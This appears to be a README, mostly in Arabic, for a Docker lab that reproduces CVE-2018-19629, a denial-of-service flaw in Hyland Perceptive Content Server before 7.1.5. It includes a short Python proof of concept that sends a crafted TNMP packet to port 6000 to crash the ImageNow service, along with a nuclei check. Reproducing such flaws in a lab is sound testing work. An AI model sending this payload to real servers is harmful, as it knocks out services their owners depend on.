
خادم Hyland Perceptive Content - رفض الخدمة
بيئة اختبار Docker لـ CVE-2018-19629 - رفض الخدمة في Hyland Perceptive Content Server.
| الحقل | القيمة |
|---|---|
| معرف CVE | CVE-2018-19629 |
| الخطورة | عالية (DoS) |
| الإصدارات المتأثرة | Hyland Perceptive Content Server < 7.1.5 |
| الإصدار المُصحَّح | 7.1.5 |
يحتوي خادم Hyland Perceptive Content Server قبل الإصدار 7.1.5 على ثغرة رفض خدمة ناتجة عن تعطُّل خدمة ImageNow Server عبر اتصال TCP. يمكن للمهاجمين تعطيل الخدمة بإرسال حزم TCP مصممة خصيصًا تحتوي على تسلسل ترويسة TNMP.
# Start the vulnerable environment
docker-compose up -d
# Verify it's listening
# (You might need netcat or similar)
nc -zv localhost 6000
# Test with nuclei template
nuclei -t ../network/cves/2018/CVE-2018-19629.yaml -u localhost:6000
يمكنك تشغيل الانهيار يدويًا باستخدام Python:
import socket
s = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
s.connect(("localhost", 6000))
# The crafted packet
payload = b'\x54\x4e\x4d\x50\x04\x00\x00\x00\x54\x4e\x4d\x45\x00\x00\x04\x00'
s.send(payload)
s.close()
افحص السجلات لرؤية الانهيار:
docker logs -f imagenow-vuln
يجب أن ترى: [!] CRITICAL: Recevied malicious 'TNMP' packet... متبوعًا بإعادة تشغيل الحاوية.
docker-compose down